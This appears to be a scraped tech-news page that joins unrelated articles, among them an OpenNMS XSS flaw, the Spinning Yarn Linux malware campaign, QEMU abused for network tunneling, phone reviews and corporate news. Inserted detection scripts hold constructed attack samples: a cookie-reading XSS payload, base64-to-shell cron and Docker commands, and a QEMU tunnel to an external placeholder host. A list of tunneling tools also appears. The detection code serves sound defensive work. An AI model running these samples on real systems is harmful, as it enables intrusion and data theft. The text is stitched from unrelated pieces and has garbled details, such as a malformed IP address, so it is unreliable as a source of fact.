A critical vulnerability in OpenNMS, a widely used network monitoring solution, has been identified, allowing attackers to inject malicious JavaScript payloads through a Cross-Site Scripting (XSS) flaw.
This vulnerability, tracked as CVE-2023-0846, has raised significant concerns due to its potential to compromise the security of networks monitored by OpenNMS.
The XSS flaw stems from improper sanitization of user input within the OpenNMS web application.
Attackers can exploit this vulnerability by sending specially crafted data to the application, which then reflects the malicious script to the user’s browser without adequate validation.
This allows the attacker to execute arbitrary JavaScript code in the context of the victim’s session, potentially leading to session hijacking, data theft, and unauthorized actions on the application.
OpenNMS XSS Flaw
Exploiting this vulnerability is particularly concerning due to its simplicity and the ease with which attackers can leverage it.
The SonarSource report states that this payload is executed when an administrator views the alarm generated by the manipulated SNMP trap, granting the attacker access to the admin’s session and the broader network.
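The reflected-XSS pattern described above comes down to trap-derived text being written into the alarm page as markup. The following added example (written for this article, not code from OpenNMS or SonarSource) shows the vulnerable rendering pattern next to a hardened one that HTML-escapes every untrusted field at output time, and a parser-based check that tells the two apart. The alarm record and the payload string are constructed values, not taken from the advisory.

```python
import html
from html.parser import HTMLParser

# Constructed sample alarm. The description field stands in for text that an
# attacker could place in an SNMP trap; the payload is a hypothetical value,
# not one taken from the advisory.
SAMPLE_ALARM = {
    "id": 42,
    "node": "core-sw-01",
    "description": '<img src=x onerror="alert(document.cookie)">',
}

FIELDS = ("id", "node", "description")


def render_alarm_unsafe(alarm):
    """Vulnerable pattern: trap-derived text is interpolated straight into HTML,
    so any markup inside it becomes live markup in the admin's browser."""
    cells = (str(alarm[k]) for k in FIELDS)
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


def render_alarm_safe(alarm):
    """Hardened pattern: every untrusted field is HTML-escaped at output time,
    quotes included, so the value is inert as text and inside attributes."""
    cells = (html.escape(str(alarm[k]), quote=True) for k in FIELDS)
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


class _TagCollector(HTMLParser):
    """Records every start tag a browser-side parser would see in the fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def unexpected_tags(rendered, allowed=("tr", "td")):
    """Return tags in the rendered fragment that the template itself did not emit.
    A non-empty result means untrusted data was interpreted as markup."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return [t for t in parser.tags if t not in allowed]


if __name__ == "__main__":
    print("unsafe:", unexpected_tags(render_alarm_unsafe(SAMPLE_ALARM)))  # ['img']
    print("safe:  ", unexpected_tags(render_alarm_safe(SAMPLE_ALARM)))    # []
```

The check deliberately parses the output rather than grepping for `<script`, because a payload need not contain that tag at all; the `img`/`onerror` variant above is one of many, and what matters is whether any element the template did not write appears in the parsed result.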
The impact of the XSS vulnerability is dramatically increased when combined with a command injection flaw in OpenNMS.
Attackers can use the XSS vulnerability to gain initial access and then exploit the command injection vulnerability to execute arbitrary code on the OpenNMS server.
This combination of vulnerabilities allows for a full compromise of the OpenNMS system, enabling attackers to manipulate network monitoring data, disrupt services, or gain unauthorized access to networked devices.
Impact on OpenNMS
The discovery of these vulnerabilities by SonarSource has prompted urgent action from the OpenNMS community.
The vulnerabilities were addressed in OpenNMS version 31.0.4, which includes fixes to prevent XSS attacks and command injection.
However, the presence of these vulnerabilities highlights the critical need for rigorous input validation and sanitization in network monitoring solutions.
Organizations using OpenNMS are strongly advised to update to the latest version to protect their networks from potential exploitation.
The XSS vulnerability in OpenNMS, especially when combined with a command injection flaw, represents a security risk.
It underscores the importance of continuous security assessment and prompt patching of vulnerabilities in critical infrastructure components like network monitoring systems.
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.
Apple has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities which are reported to already have been exploited. Zero-day vulnerabilities are discovered by attackers before the software company itself – meaning the vendor has ‘zero days’ to fix them.
Both vulnerabilities allow an attacker to bypass the memory protections that would normally stop someone from running malicious code. Reportedly, attackers used them with another unpatched vulnerability or malicious app, and the combination could be used to give them complete control over targeted iPhones.
The update is available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later.
A patch for iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation, running iOS 16.7.6 or iPadOS 16.7.6 is available for one of the vulnerabilities.
To check if you’re using the latest software version, go to Settings > General > Software Update. You want to be on iOS 17.4 or iPadOS 17.4, so update now if you’re not. It’s also worth turning on Automatic Updates if you haven’t already. You can do that on the same screen.
Technical details
The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The zero-day CVEs patched in these updates are:
CVE-2024-23225: a memory corruption issue was addressed with improved validation. A patch is available for this issue in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple says it’s aware of a report that this issue may have seen active exploitation.
CVE-2024-23296: a memory corruption issue in RTKit was addressed with improved validation. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple says it’s aware of a report that this issue may have seen active exploitation.
RTKit is Apple’s real-time operating system, running on multiple chips in iPhone, Watch, MacBook, and peripherals like the iPod. A real-time operating system is software that manages tasks on a single core, which is crucial for real-time applications that require precise timing.
Apple included several other vulnerabilities in the update, some of which it listed but it also mentions “Additional CVE entries coming soon.” For protection against attackers reverse engineering updates to find the vulnerabilities, Apple doesn’t disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available.
Google, through a recent case study, gave some insights into Meta’s internal processes about how it plans to deliver rapid app updates. The research showcased Meta’s capacity to make fast rollouts of its core apps such as Facebook, Instagram, Threads, and Messenger among others within just one to two months after the release of Android 14 AOSP.
Meta automates updates, blazing the trail for others
As explained by Android Central, this speed of adoption is so far unique to Meta. It took the company only seven to nine months to align with Android 12, so its current pace is four times faster, a very significant step in targetSDK adoption.
The Android OS Readiness Program by Meta was among the key initiatives that made this level of efficiency possible. It expedited deployments by preparing for and testing new operating system updates according to strategic goals. The program grew out of what Meta learned while overcoming the challenges of Android 11, where slow adoption of developer tooling and a decentralized app approach made troubleshooting more complex.
SDK release preparation, automated by Meta, was part of the program that reduced the time required from three weeks to just three hours. This automation allowed Meta to quickly test new updates with each beta version of Android 14. The process of preparing releases in an accelerated manner for efficient testing and troubleshooting thus ensured timely updates for Facebook, Instagram, Threads, and Messenger.
Update automation to become mainstream in the future
It is a good sign that other companies can also adopt the update process used by Google and Meta. Google and Meta intend to encourage other application developers to implement centralized, automated development processes. This will let smaller developer teams speed up release preparation, so users can get optimized Android apps in the shortest possible time.
The optimized app delivery has become the forte of Meta’s development team. This success story from Meta points out how automating right can significantly reduce app update timelines, therefore setting a precedent for the entire app development community.
Several internet users have resorted to Google services for their online requirements in the aftermath of a recent Facebook outage. They were shocked to see that outages are also occurring with Google services, such as Gmail and YouTube. Numerous individuals are curious about what is happening and how it is influencing their everyday routines in light of this unexpected turn of events.
The impact of the outage
The internet community has been severely disrupted by the simultaneous outages of Google and Facebook services. These platforms are very important for communication, entertainment, and productivity for a large number of people and enterprises. People are having trouble keeping in touch with their loved ones, getting essential information, and doing their job duties because both Facebook and Google services are unavailable.
The widely used video-sharing platform, YouTube, is among the most negatively impacted services. Many people are still unable to access YouTube, which prevents content creators from uploading new videos and consumers from watching their favorite material. The YouTube community, who depend on the site for both pleasure and education, is now frustrated as a result.
The response from Google
Google has issued a statement in reaction to the outages. The company apologized for the inconvenience and promised consumers that they’re trying to find a swift solution. The IT behemoth has sent out its engineering team to look into the underlying causes of the issues and put the required changes in place. The timeframe for the complete restoration of services is yet unknown, despite their best efforts.
Although Google has not disclosed any precise information regarding the reason behind the outages, many people theorize that a server overload or technical malfunction may be to blame. Given the company’s reputation for dependability and strong infrastructure, many people were surprised by the extensive interruptions.
What can users do?
Users are encouraged to be patient and look into other platforms for their internet requirements in the interim. Social networking sites that allow users to maintain connections with one another, such as Instagram and Twitter, are still operational. Until the problems with Google services are fixed, customers may also think about using other email providers and video-sharing websites.
American Express has recently notified its customers of a data breach involving a third-party service provider, marking a security incident that has potentially compromised customer information.
This breach underscores the vulnerabilities that can arise from third-party partnerships, even when a company’s systems remain secure.
Here, we delve into the details of the breach, its impact on customers, and the response from American Express.
Data Breach Details
The breach occurred through a third-party service provider that is frequently used by American Express, particularly by the company’s travel services division.
It’s important to note that American Express’s systems were not directly compromised in this incident.
The breach was disclosed in a notification filed with the state of Massachusetts and involved unauthorized access to the third party’s system, which led to the exposure of American Express card account numbers, names, and expiration dates.
Customers potentially affected by this breach have been warned that their account details, including card account numbers, names, and other information such as expiration dates, might have been compromised.
American Express has emphasized that it is monitoring accounts for fraudulent activity and has assured customers that they will not be held liable for any fraudulent charges on their accounts.
The company has advised customers to review their account statements carefully for any signs of fraudulent activity, especially over the next 12 to 24 months, and to enable notifications in the American Express Mobile app to stay updated on account activity.
Company Response
In response to the breach, American Express has taken several steps to protect its customers and mitigate the impact.
The company is vigilantly monitoring affected accounts for signs of fraud and has provided customers with detailed instructions on how to protect their accounts.
These instructions include reviewing account statements, enabling notifications for suspicious activity, and ensuring that contact information is up to date.
American Express has also provided additional tips for protecting against fraud and identity theft, such as visiting the Federal Trade Commission (FTC) website for advice on safeguarding personal information.
American Express has emphasized its commitment to protecting the privacy and security of customer information and expressed regret for any concern the breach may have caused.
The company has made it clear that it understands the paramount importance of security, especially in today’s environment, and is strongly committed to maintaining the trust of its customers.
Linux Users Beware: “Spinning YARN” Malware Campaign Targets Misconfigured Servers Running on Apache Hadoop YARN, Docker, Confluence and Redis.
Cado Security Labs has discovered an emerging Linux malware campaign dubbed Spinning Yarn targeting misconfigured servers running Apache Hadoop YARN, Docker, Confluence, and Redis web-facing services.
The emergence of the new Linux malware shouldn’t come as a surprise, given the recent surge in threats targeting Linux devices and servers. Just a couple of days ago, an old Linux malware known as Bifrost RAT resurfaced with a new variant that mimics VMware domains.
According to Cado Security’s research, shared with Hackread.com ahead of publication on Wednesday, Spinning Yarn is a malicious campaign that exploits weaknesses in popular Linux software used by businesses across various sectors.
These services are crucial components in organizations’ IT infrastructure. Docker is critical for developing, deploying, and managing containerized applications. Apache Hadoop allows distributed processing of large datasets. Redis, a widely used in-memory data store, helps in caching real-time applications, and Confluence allows collaboration and knowledge management.
By compromising these applications, attackers can gain unauthorized access to systems, steal sensitive data, disrupt operations, or deploy ransomware, posing a significant threat to servers and critical infrastructure.
In Spinning Yarn, threat actors have used several unique payloads, including four Golang binaries that automate the discovery, infection, and exploitation of hosts. They use Confluence to exploit common misconfigurations and vulnerabilities, launching Remote Code Execution (RCE) attacks and infecting new hosts.
The attackers exploit CVE-2022-26134, an n-day vulnerability in Confluence, and deploy a container for the Docker compromise. The vulnerability has been exploited since 2022, including by the Mirai malware variant V3G4 against IoT devices for DDoS attacks.
Further probing revealed a series of shell scripts and standard Linux attack techniques used to deliver a cryptocurrency miner, spawn a reverse shell, and enable persistent access to compromised hosts. They also deploy an instance of the Platypus open-source reverse shell utility to maintain access.
In an attempt to evade detection, multiple user-mode rootkits are deployed. Researchers observed that the shell script payloads employed in this campaign share similarities with those used in previous cloud attacks.
In their blog post, Cado Security Labs detailed initial access activity on a Docker Engine API honeypot at this IP address: 47966971. The attacker spawned a new container using Alpine Linux and created a bind mount for the underlying server’s root directory. This technique is common in Docker attacks: it allows attackers to write files to the host and register a job with the Cron scheduler, eventually achieving RCE.
In this campaign, the attacker wrote an executable and registered a Cron job to execute base64-encoded shell commands. Such an extensive attack on Linux applications demonstrates attackers’ growing sophistication in targeting web-facing services in cloud environments and keeping abreast of vulnerabilities.
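The two host-side artefacts just described, a container created with a bind mount of the host’s root directory and a Cron entry that decodes base64 at run time, are both easy to check for. The following added example (written for this article, not code from Cado Security or the campaign) inspects a Docker Engine `/containers/create` request body for sensitive bind mounts and a crontab for base64-decoding entries, decoding the embedded blob so an analyst can see what it would run. The request bodies and crontab lines are constructed samples that follow the real Docker API and crontab formats; the `SENSITIVE_HOST_PATHS` list is a starting point, not an exhaustive one.

```python
import base64
import json
import re

# --- Constructed samples. Shapes follow the Docker Engine API and crontab
# formats; the values are made up for this example, not from Cado's report. ---

SAMPLE_CREATE_BODY = json.dumps({
    "Image": "alpine:latest",
    "Cmd": ["chroot", "/mnt", "sh", "-c", "echo aGk= | base64 -d | sh"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
})

BENIGN_CREATE_BODY = json.dumps({
    "Image": "nginx:1.25",
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
})

_ENCODED_CMD = base64.b64encode(b"echo spinning-yarn-test > /tmp/marker").decode()
SAMPLE_CRONTAB = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/bin/apt-get update\n"
    f"* * * * * echo {_ENCODED_CMD} | base64 -d | sh\n"
)

# Host paths that should never be handed to an untrusted container (starting list).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/spool/cron", "/var/run/docker.sock")


def _is_sensitive(src):
    return src in SENSITIVE_HOST_PATHS or any(
        src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/"
    )


def bind_mount_findings(body_json):
    """Flag a /containers/create request that exposes the host filesystem or
    carries a command that chroots into the mount / decodes base64."""
    body = json.loads(body_json)
    host_cfg = body.get("HostConfig") or {}
    findings = []
    for bind in host_cfg.get("Binds") or []:
        src = bind.split(":", 1)[0]          # "host_path:container_path[:opts]"
        if _is_sensitive(src):
            findings.append(f"bind mount exposes host path {src!r} ({bind!r})")
    if host_cfg.get("Privileged"):
        findings.append("container requested privileged mode")
    cmd = " ".join(body.get("Cmd") or [])
    if re.search(r"\bchroot\s+/mnt\b", cmd) or re.search(r"base64\s+(-d|--decode)\b", cmd):
        findings.append(f"suspicious container command: {cmd!r}")
    return findings


_B64_DECODE = re.compile(r"base64\s+(-d|--decode)\b")
_B64_BLOB = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/]{8,}={0,2})")


def cron_findings(crontab_text):
    """Return (line, decoded_payload) for crontab entries that decode base64 at run time.
    Comments, blank lines and ordinary jobs are skipped."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or not _B64_DECODE.search(line):
            continue
        decoded = ""
        blob = _B64_BLOB.search(line)
        if blob:
            try:
                decoded = base64.b64decode(blob.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                decoded = "<undecodable>"
        findings.append((line, decoded))
    return findings


if __name__ == "__main__":
    for f in bind_mount_findings(SAMPLE_CREATE_BODY):
        print("docker:", f)
    for line, decoded in cron_findings(SAMPLE_CRONTAB):
        print("cron:", line, "->", decoded)
```

Run against a Docker daemon’s request log or a host’s `/etc/cron*` and `/var/spool/cron` contents, the same two functions apply unchanged; the point of decoding the blob rather than only flagging the line is that a base64 wrapper is exactly what hides the command from a grep-based review.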
To mitigate the risks from campaigns like Spinning Yarn, regularly update software, enable strong passwords, educate employees on cybersecurity best practices, segment your network to limit potential damage, and deploy security solutions like endpoint security solutions and firewalls to detect and prevent malware infections. This will help protect against known vulnerabilities and ensure a secure environment.
UPDATE: Google is now rolling out a new Pixel Feature Drop update, for March 2024, and the Pixel 7 is one of the phones getting it. Read more about what it brings at the very end of the article.
Google announced two new smartphones today, the Pixel 7 and Pixel 7 Pro. These are basically the company’s new flagship smartphones, and direct successors to the Pixel 6 series. The company did not revamp the design completely this time around, but it did make some changes to differentiate this year’s lineup. Both devices come with better protection of the camera visor on the back, thanks to the metal cover on top of it.
The camera hardware did not see major changes compared to last year either, but there’s still plenty to talk about. We’ve already covered both phones extensively on the site, but if you want to grab a ton of information in a single article, this is the one. Here we’ll focus on the Pixel 7, the smaller of the two new flagships. If you’d like to know its price, specs, features, and so much more… read on.
How much does the Google Pixel 7 cost?
The Google Pixel 7 starts at $599. That basically means it has the same price as the Pixel 6 when it launched last year. That price applies for the 128GB storage option. There is a 256GB storage model on offer as well, and that variant will set you back $699. The device is available to pre-order starting today, by the way.
Should I wait for a price drop?
The Google Pixel 7 is priced more than fair considering the competition. Chances are it will not get a price drop anytime soon. So, if you’re planning to hold out on buying one just because you think you can get a discount in the near future, chances are that it won’t happen. If you’re interested in this phone, and you plan on buying a phone soon, our advice would be to go ahead and do it.
Where can I buy the Google Pixel 7?
The Google Pixel 7 is easy to come by in the US, you’ll find it in all the usual places that sell the Pixel. You can get it directly from the Google Store, or from Best Buy. You can also grab it from carriers, if you want. It will likely be available from AT&T, T-Mobile, and Verizon. You can also finance your Pixel 7 through Google Fi, and possibly the three aforementioned carriers. Do note that the carriers may also offer some special deals.
In the US, you can get up to $750 off any Pixel 7 phone with a qualifying trade-in. On top of that, Google is offering up to $200 in Google Store credit towards your next purchase.
What offers are available from AT&T?
AT&T has announced that new and existing AT&T customers can get a free Google Pixel 7, or up to $800 off the Pixel 7 Pro with eligible trade-ins. The company also said that users can take advantage of AT&T’s buy one Pixel Watch and get one free offer.
What offers are available from T-Mobile?
If you’d like to purchase the Pixel 7 from T-Mobile, you can get a $500 discount with a new line of service. You can get up to $800 off for the Pixel 7 Pro, but with a new or existing Magenta Max plan and an eligible trade-in.
What offers are available from Verizon?
Verizon is offering a free Pixel 7 with an eligible trade-in. Of course, the value of a trade-in will depend on what phone we’re talking about, and in what condition it is. Verizon does accept broken phones as well, though. Do note that you also must be on an eligible Unlimited plan for this. You can also grab a $100 discount on the Pixel Buds Pro, and 20% off on select cases and screen protectors.
What carriers support the Google Pixel 7?
When it comes to the US, all three major carriers support the Pixel 7. Namely, we’re talking about AT&T, T-Mobile, and Verizon. The device itself supports both mmWave and Sub-6 5G networks, so you’ll get proper 5G support regardless of which carrier you choose.
In addition to the aforementioned carriers, a ton of MVNOs also support the Pixel 7. That goes for Google Fi, Cricket, Metro by T-Mobile, Mint Mobile, Straight Talk, and more. Do note that not all of them will sell the phone, though, even though they will support it. You can simply grab it from Google, and opt for one of the MVNOs.
What colors are available?
The Google Pixel 7 comes in three color options. Those colors are Lemongrass, Obsidian Black, and Snow.
The Lemongrass color is basically a very light white color, combined with a light gray frame and camera visor. The Obsidian Black color combines a black backplate, with a dark gray frame and camera visor. And last, but not least, the Snow color comes with a white backplate, and silver frame camera visor protection.
What are the specs of the Google Pixel 7?
Below are the specs for the Google Pixel 7, and next to it, you’ll notice specs for the Google Pixel 7 Pro, for comparison’s sake.
When it comes to software features, Google focused largely on camera features. Android 13 is well-known to everyone by now, and you’re getting all those goodies, along with a bunch of camera features that we’ll touch upon below.
Cinematic Blur
Cinematic Blur is one of the main new camera features on the Pixel 7 series devices. This is essentially Google’s version of Apple’s Cinematic Mode. It allows you to switch between two subjects, while keeping one focused, and the other blurred (the background one). This technique has been used in cinematography for a long time, and it can be useful on phones if you shoot specific types of videos.
Extreme Battery Saver
The Extreme Battery Saver is another feature Google is promoting for both Pixel phones. This feature basically shuts down all apps except those you select, and thus prolongs battery life considerably. The apps that don’t work will be grayed out on the display. Do note that system apps such as Phone, Messages, Clock, and Settings will remain active no matter what; you cannot disable those.
Photo Unblur
Photo Unblur is a brand new feature Google presented during its Pixel 7 series keynote. It can remove blur from images, basically make blurry images look great. Google did show some really impressive samples during the keynote.
Guided Frame
For people who are blind, or have poor vision, and like to take selfies, this is the feature to use. Guided Frame will give out audio instructions, haptic feedback, and offer high-contrast visual animations.
10-bit HDR videos
The Google Pixel 7 and Pixel 7 Pro also got 10-bit HDR support for video recording. You’ll now get higher contrast videos with wider color ranges.
What official cases are available?
With the Google Pixel 7, Google released a similar case as the one last year. That case comes in three color options, and Google used the same color names as for the devices themselves, well, for the most part. So, you have Lemongrass, Obsidian, and Snow Chalk options. These cases are a bit different than the ones last year. Google changed the physical button covers. Last year, the same material the case was made from covered the physical buttons, that’s no longer the case. This time around, the company included pieces of metal or plastic (either way, they have a metallic finish), to make these cases feel more premium, and offer more clickiness. You can check out all the color variants below, and take a closer look. These are the only official cases Google announced, and they’re priced at $29.99 each.
Google is offering various different, third-party cases through its website, though. You can get a leather case from Bellory, OtterBox’s Defender Series case, or a case from Case-Mate. Those are only some examples. Follow the link below and choose your own!
Google has released a new update for its Pixel phones, a security update for February 2024. One of the devices that is getting that update is the Pixel 7, of course. There are no specific entries for the Pixel 7a in the changelog, but there is one that targets all phones that the update is coming to. Google has released a fix for “stability or performance with certain third-party apps”.
Updated March 6, 2024:
As part of the Pixel Feature Drop update for March 2024, Google is making a couple of changes, and adding new features along the way. One of the most notable changes is an improved Call Screen feature. Your Pixel 7 will now be able to help you get the call on the way if the caller is silent. You’ll get a prompt from the Google Assistant to move things along.
The Pixel Feature Drop also improves Instagram compatibility. It enables you to capture and share 10-bit HDR videos directly on Instagram Reels. On top of that, you can also upload and share Ultra HDR photos to your Instagram feed.
This Pixel Feature Drop also delivered a Pixel 7 series-specific change. The Circle to Search function is finally available on Pixel 7 phones. All you have to do is summon Google Assistant, circle what you’re interested in, and there you go.
Samsung may have found an unconventional, perhaps misleading, way to beat TSMC to 2nm mass production. Rather than speeding up the development of its 2-nanometer semiconductor fabrication technology, the company plans to rename its 2nd-gen 3nm process 2nm. It will market chips based on the 2nd-gen 3nm process, expected to arrive later this year, as 2nm solutions. The “real” 2nm chips may debut in the second half of 2025.
Samsung to market its next-gen 3nm chips as 2nm
Samsung is the world’s first semiconductor foundry to begin 3nm mass production. It flipped the switch in mid-2022, with TSMC following a few months later. However, the latter went on to secure better yield rates and win major 3nm contracts. It has already produced a 3nm smartphone chip, Apple’s A17 Pro for the iPhone 15 Pro and iPhone 15 Pro Max. Samsung Foundry has yet to win 3nm manufacturing contracts from smartphone companies.
Since TSMC stuck with the older FinFET transistor architecture for its 3nm process, it might have helped the firm achieve better yields quickly. Samsung, on the other hand, upgraded to the more advanced GAA architecture and is struggling with yield. With TSMC surging ahead in the 3nm race, the Korean firm is now adopting a peculiar tactic that makes it look like it has outpaced its arch-rival in the 2nm development work.
According to ZDNet, Samsung has informed its partners and customers that its 2nd-gen 3nm process will be called 2nm from here on. “We have been informed by Samsung Electronics that they will change the 2nd generation 3-nano technology to 2-nano technology,” the publication quotes an official in the fabless semiconductor industry. The official confirmed that Samsung has rewritten 3nm contracts signed last year to reflect this change.
The report adds that Samsung’s recent agreement with the Japanese AI startup PFN (Preferred Networks) for 2nm chips is for 2nd-gen 3nm solutions. In other words, it has yet to secure a 2nm manufacturing contract in the true sense. This is extremely confusing and misleading. It is unclear why Samsung is doing this. More importantly, it remains to be seen what term the company uses to refer to its “real” 2nm chips.
Qualcomm has asked for 2nm samples from the two foundries
Samsung reportedly planned this change last year and is finally executing it. Perhaps reports about the company skipping the 3nm process and directly jumping to 2nm likely stemmed from this. Qualcomm recently requested 2nm samples from Samsung and TSMC. It will be interesting to see whether Samsung sends samples of its 2nd-gen 3nm process or the real 2nm solution. If it goes with the former process, TSMC might have something to say about it.
During its largest US creator summit, “For Creators: Future Formats Summit,” TikTok made some interesting announcements regarding creators and the many ways they can monetize their content.
For example, the social giant revealed that it will upgrade the Creator Portal to the Creator Academy. The change is meant to provide all creators with regularly updated resources, courses, articles, videos, and insights.
Currently, the Creator Academy is in testing, but the support tool will be available in the coming weeks in seven different languages, with more to come, which can be accessed in-app via Creator tools.
Another important TikTok change involves the Creativity Program. The feature was launched in beta last year as a way to help creators foster their creativity, generate higher revenue potential and unlock more opportunities.
This week, TikTok announced that in the coming weeks, the Creativity Program will be leaving beta with some improvements and a new name, Creator Rewards Program.
According to TikTok, the Creativity Program was a success, as total creator revenue increased by over 250 percent within the last 6 months, and the number of creators making $50,000 each month nearly doubled.
The upcoming Creator Rewards Program will continue to reward original content over a minute long with an optimized rewards formula focused on four key areas: originality, play duration, search value, and audience engagement.
Finally, TikTok announced plans to expand LIVE Subscription to make it available to non-LIVE creators on the social app. The feature will be known as Subscription going forward and it will be initially available to invite-only creators. Eligible creators will be able to sign up to access this feature in the coming weeks.
QEMU is an open-source platform that provides a secure and private virtualized space for trying out malicious code, exploits, and attacks in an environment of one’s own.
This controlled testing ground minimizes the risk of detection and legal matters.
Moreover, QEMU permits hackers to develop malware that can run across different hardware architectures and operating systems.
Cybersecurity researchers at Kaspersky Labs recently discovered that hackers are abusing the QEMU hardware emulator to exfiltrate stolen data covertly.
QEMU Hardware Emulator
Attackers love using genuine tools, both to avoid detection and to reduce spending on malware.
Data exfiltration, drive encryption, remote execution, memory dumping, and network scanning are some of the activities that trusted software supports.
Pre-installed malware or RDP/VPN access that mimics employees serves as a foothold on compromised systems.
Network tunnels and port-forwarding utilities let attackers bypass NAT and firewalls, thus gaining entry into internal systems.
Numerous tools exist for creating network tunnels between systems, some direct, others using proxies to mask attacker IPs.
These utilities frequently surfaced during researchers’ incident response efforts over the past three years.
Here below we have mentioned the tools:
Stowaway
ligolo
3proxy
dog-tunnel
chisel
FRP
ngrok
gs-netcat
plink
iox
nps
Experts uncovered suspicious activity in a company’s system during a recent investigation. Among the tools detected were Angry IP Scanner, mimikatz, and QEMU.
The presence of QEMU puzzled security analysts – why would attackers use a virtualizer? Further analysis revealed an unusual QEMU execution command line without a LiveCD or disk image.
Here below we have mentioned all the arguments:
-m 1M: Allocated only 1MB RAM, which is insufficient for most OSes.
-netdev user,id=lan,restrict=off: Created virtual network interface ‘lan’ to communicate externally, without restrictions.
-netdev socket,id=sock,connect=<IP>:443: Socket interface ‘sock’ connected to remote server at <IP>:443.
-netdev hubport,id=port-lan/port-sock,hubid=0,netdev=lan/sock: Added ports to a virtual hub linked to the ‘lan’ and ‘sock’ interfaces.
-nographic: Started QEMU in non-GUI console mode.
The external <IP> raised suspicions. QEMU allows VMs to be interconnected via -netdev options, which create network backends.
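The argument combination above is distinctive enough to score mechanically: almost no RAM, no disk image or kernel to boot, a socket backend pointing at an external host, an unrestricted user backend, and a hub joining them. The following added example (written for this article, not code from Kaspersky or Securelist) parses a QEMU command line such as an EDR or process-creation log would record and returns the reasons it looks like a network pivot rather than a virtual machine. The sample command lines are constructed; the remote address is a documentation-range placeholder standing in for the attacker’s <IP>, and the 16 MB threshold and the storage-flag list are choices made here, not values from the report.

```python
import re
import shlex

# Constructed command line reproducing the argument pattern described above,
# with a documentation-range placeholder in place of the attacker's <IP>.
SAMPLE_CMDLINE = (
    "qemu-system-x86_64 -m 1M "
    "-netdev user,id=lan,restrict=off "
    "-netdev socket,id=sock,connect=203.0.113.10:443 "
    "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
    "-netdev hubport,id=port-sock,hubid=0,netdev=sock "
    "-nographic"
)

# Ordinary VM launch, for contrast (also constructed).
BENIGN_CMDLINE = (
    "qemu-system-x86_64 -m 2048 -hda disk.qcow2 "
    "-netdev user,id=n0 -device e1000,netdev=n0"
)

# Flags that give the guest something to boot; their absence is a signal.
STORAGE_FLAGS = {"-hda", "-hdb", "-cdrom", "-drive", "-kernel", "-blockdev"}
_SIZE_RE = re.compile(r"^(?:size=)?(\d+)([kKmMgG]?)$")
TINY_RAM_MB = 16  # chosen threshold: nothing bootable fits below this


def mem_mb(value):
    """Convert a -m argument ('1M', '2048', 'size=4G') to megabytes; None if unparsable."""
    m = _SIZE_RE.match(value)
    if not m:
        return None
    num, unit = int(m.group(1)), m.group(2).upper()
    return {"K": num / 1024, "M": num, "G": num * 1024, "": num}[unit]


def parse_netdev(spec):
    """'socket,id=sock,connect=1.2.3.4:443' -> {'type': 'socket', 'id': 'sock', 'connect': ...}"""
    parts = spec.split(",")
    out = {"type": parts[0]}
    for kv in parts[1:]:
        key, _, val = kv.partition("=")
        out[key] = val
    return out


def qemu_tunnel_indicators(cmdline):
    """Return human-readable reasons a QEMU invocation looks like a network pivot
    rather than a real virtual machine. An empty list means nothing stood out."""
    argv = shlex.split(cmdline)
    reasons, netdevs, has_storage = [], [], False
    for i, arg in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if arg in STORAGE_FLAGS:
            has_storage = True
        elif arg == "-m":
            mb = mem_mb(nxt)
            if mb is not None and mb <= TINY_RAM_MB:
                reasons.append(f"guest RAM {nxt} is too small to boot any OS")
        elif arg == "-netdev":
            netdevs.append(parse_netdev(nxt))
        elif arg == "-nographic":
            reasons.append("-nographic: no console is shown to the user")
    types = [n["type"] for n in netdevs]
    for n in netdevs:
        if n["type"] == "socket" and ("connect" in n or "listen" in n):
            peer = n.get("connect") or n.get("listen")
            reasons.append(f"socket backend to {peer} carries raw frames over TCP")
        if n["type"] == "user" and n.get("restrict") == "off":
            reasons.append("unrestricted user backend gives the hub outbound access")
    if "hubport" in types and "socket" in types:
        reasons.append("hubport bridges the socket and user backends into one L2 segment")
    if netdevs and not has_storage:
        reasons.append("network backends defined but no disk image, CD or kernel to run")
    return reasons


if __name__ == "__main__":
    for r in qemu_tunnel_indicators(SAMPLE_CMDLINE):
        print("-", r)
    print("benign:", qemu_tunnel_indicators(BENIGN_CMDLINE))  # []
```

No single indicator is conclusive (`-nographic` is common on servers, and a socket backend has legitimate uses when linking VMs), which is why the function returns the list rather than a verdict; the combination of tiny RAM, no bootable media and a socket backend to an external address is what merits an analyst’s attention.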
Network tunnel (Source – Securelist)
Experts used QEMU to build a Kali Linux VM on AttackerServer. The VM was connected through a socket adapter and listened on port 443.
PivotHost had another QEMU instance that connected to the socket over AttackerServer’s port 443.
The user adapter was joined to the socket adapter via the hub, mirroring the adversary’s QEMU options.
QEMU set up a PivotHost-AttackerServer tunnel to enable subnet scans from PivotHost to the Kali VM.
